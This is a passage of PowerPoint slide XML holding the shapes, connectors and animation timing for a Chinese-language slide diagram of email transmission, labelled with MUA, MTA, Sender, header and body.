                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5735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57353"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57353"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57353"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="573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bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="57349" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="57350" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="57351" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="57352" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="57353" grpId="0" bldLvl="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63B42438-43F2-4541-AB55-B59657066F87}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370" name="Rounded Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="682625" y="1917700"/>
            <a:ext cx="2952750" cy="2663825"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="20768B"/>
            </a:solidFill>
            <a:bevel/>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endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156676" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子邮件传输过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5837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0338" y="2060575"/>
            <a:ext cx="6667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14007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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="3140075"/>
            <a:ext cx="687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MTA</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58375" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="3933825"/>
            <a:ext cx="949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MUA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="18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Sender</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58376" name="Rounded Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5580063" y="3644900"/>
            <a:ext cx="2952750" cy="2663825"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="20768B"/>
            </a:solidFill>
            <a:bevel/>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endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5837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76913" y="3860800"/>
            <a:ext cx="6667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925" y="47974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Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5795963" y="4940300"/>
            <a:ext cx="687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MTA</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sp>
        <p:nvSpPr>
          <p:cNvPr id="58380" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7583488" y="5589588"/>
            <a:ext cx="949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MUA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sender</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="583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8907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382" name="Shape 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1331913" y="2579688"/>
            <a:ext cx="1368425" cy="560387"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58383" name="Elbow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3367088" y="2579688"/>
            <a:ext cx="557212" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 106181"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58384" name="Shape 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4726781" y="3329782"/>
            <a:ext cx="1109663" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58385" name="Shape 23"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6443663" y="4379913"/>
            <a:ext cx="1571625" cy="417512"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5508625" y="2852738"/>
            <a:ext cx="2232025" cy="434975"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2232248" cy="434362"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="156694" name="Freeform 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="646331" cy="434362"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 646331"/>
                <a:gd name="T1" fmla="*/ 72395 h 434362"/>
                <a:gd name="T2" fmla="*/ 21204 w 646331"/>
                <a:gd name="T3" fmla="*/ 21204 h 434362"/>
                <a:gd name="T4" fmla="*/ 72395 w 646331"/>
                <a:gd name="T5" fmla="*/ 0 h 434362"/>
                <a:gd name="T6" fmla="*/ 573936 w 646331"/>
                <a:gd name="T7" fmla="*/ 0 h 434362"/>
                <a:gd name="T8" fmla="*/ 625127 w 646331"/>
                <a:gd name="T9" fmla="*/ 21204 h 434362"/>
                <a:gd name="T10" fmla="*/ 646331 w 646331"/>
                <a:gd name="T11" fmla="*/ 72395 h 434362"/>
                <a:gd name="T12" fmla="*/ 646331 w 646331"/>
                <a:gd name="T13" fmla="*/ 361967 h 434362"/>
                <a:gd name="T14" fmla="*/ 625127 w 646331"/>
                <a:gd name="T15" fmla="*/ 413158 h 434362"/>
                <a:gd name="T16" fmla="*/ 573936 w 646331"/>
                <a:gd name="T17" fmla="*/ 434362 h 434362"/>
                <a:gd name="T18" fmla="*/ 72395 w 646331"/>
                <a:gd name="T19" fmla="*/ 434362 h 434362"/>
                <a:gd name="T20" fmla="*/ 21204 w 646331"/>
                <a:gd name="T21" fmla="*/ 413158 h 434362"/>
                <a:gd name="T22" fmla="*/ 0 w 646331"/>
                <a:gd name="T23" fmla="*/ 361967 h 434362"/>
                <a:gd name="T24" fmla="*/ 0 w 646331"/>
                <a:gd name="T25" fmla="*/ 72395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6331"/>
                <a:gd name="T40" fmla="*/ 0 h 434362"/>
                <a:gd name="T41" fmla="*/ 646331 w 646331"/>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6331" h="434362">
                  <a:moveTo>
                    <a:pt x="0" y="72395"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53195"/>
                    <a:pt x="7627" y="34781"/>
                    <a:pt x="21204" y="21204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34781" y="7627"/>
                    <a:pt x="53195" y="0"/>
                    <a:pt x="72395" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="573936" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="593136" y="0"/>
                    <a:pt x="611550" y="7627"/>
                    <a:pt x="625127" y="21204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="638704" y="34781"/>
                    <a:pt x="646331" y="53195"/>
                    <a:pt x="646331" y="72395"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="646331" y="361967"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="646331" y="381167"/>
                    <a:pt x="638704" y="399581"/>
                    <a:pt x="625127" y="413158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="611550" y="426735"/>
                    <a:pt x="593136" y="434362"/>
                    <a:pt x="573936"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1500">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>信头</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156695" name="Freeform 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="648072" y="0"/>
              <a:ext cx="1584176" cy="434362"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 646331"/>
                <a:gd name="T1" fmla="*/ 72395 h 434362"/>
                <a:gd name="T2" fmla="*/ 67695011 w 646331"/>
                <a:gd name="T3" fmla="*/ 21204 h 434362"/>
                <a:gd name="T4" fmla="*/ 231122970 w 646331"/>
                <a:gd name="T5" fmla="*/ 0 h 434362"/>
                <a:gd name="T6" fmla="*/ 1832307971 w 646331"/>
                <a:gd name="T7" fmla="*/ 0 h 434362"/>
                <a:gd name="T8" fmla="*/ 1995736146 w 646331"/>
                <a:gd name="T9" fmla="*/ 21204 h 434362"/>
                <a:gd name="T10" fmla="*/ 2063431230 w 646331"/>
                <a:gd name="T11" fmla="*/ 72395 h 434362"/>
                <a:gd name="T12" fmla="*/ 2063431230 w 646331"/>
                <a:gd name="T13" fmla="*/ 361967 h 434362"/>
                <a:gd name="T14" fmla="*/ 1995736146 w 646331"/>
                <a:gd name="T15" fmla="*/ 413158 h 434362"/>
                <a:gd name="T16" fmla="*/ 1832307971 w 646331"/>
                <a:gd name="T17" fmla="*/ 434362 h 434362"/>
                <a:gd name="T18" fmla="*/ 231122970 w 646331"/>
                <a:gd name="T19" fmla="*/ 434362 h 434362"/>
                <a:gd name="T20" fmla="*/ 67695011 w 646331"/>
                <a:gd name="T21" fmla="*/ 413158 h 434362"/>
                <a:gd name="T22" fmla="*/ 0 w 646331"/>
                <a:gd name="T23" fmla="*/ 361967 h 434362"/>
                <a:gd name="T24" fmla="*/ 0 w 646331"/>
                <a:gd name="T25" fmla="*/ 72395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6331"/>
                <a:gd name="T40" fmla="*/ 0 h 434362"/>
                <a:gd name="T41" fmla="*/ 646331 w 646331"/>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6331" h="434362">
                  <a:moveTo>
                    <a:pt x="0" y="72395"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="53195"/>
                    <a:pt x="7627" y="34781"/>
                    <a:pt x="21204" y="21204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34781" y="7627"/>
                    <a:pt x="53195" y="0"/>
                    <a:pt x="72395" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="573936" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="593136" y="0"/>
                    <a:pt x="611550" y="7627"/>
                    <a:pt x="625127" y="21204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="638704" y="34781"/>
                    <a:pt x="646331" y="53195"/>
                    <a:pt x="646331" y="72395"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="646331" y="361967"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="646331" y="381167"/>
                    <a:pt x="638704" y="399581"/>
                    <a:pt x="625127" y="413158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="611550" y="426735"/>
                    <a:pt x="593136" y="434362"/>
                    <a:pt x="573936"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9639E"/>
            </a:solidFill>
            <a:ln w="55000" cmpd="thickThin">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:bevel/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="78354" tIns="78354" rIns="78354" bIns="78354"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lgn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1500">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>主体</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58389" name="Straight Connector 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4787900" y="2925763"/>
            <a:ext cx="720725" cy="719137"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="39639D"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58390" name="Straight Connector 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4787900" y="3265488"/>
            <a:ext cx="741363" cy="379412"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15875">
            <a:solidFill>
              <a:srgbClr val="39639D"/>
            </a:solidFill>
            <a:bevel/>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373"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58373"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58373"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58373"/>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58375"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58375"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58375"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5837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8382"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58382"/>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8372"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58372"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58372"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58372"/>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58374"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58374"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58374"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="58374"/>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58383"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
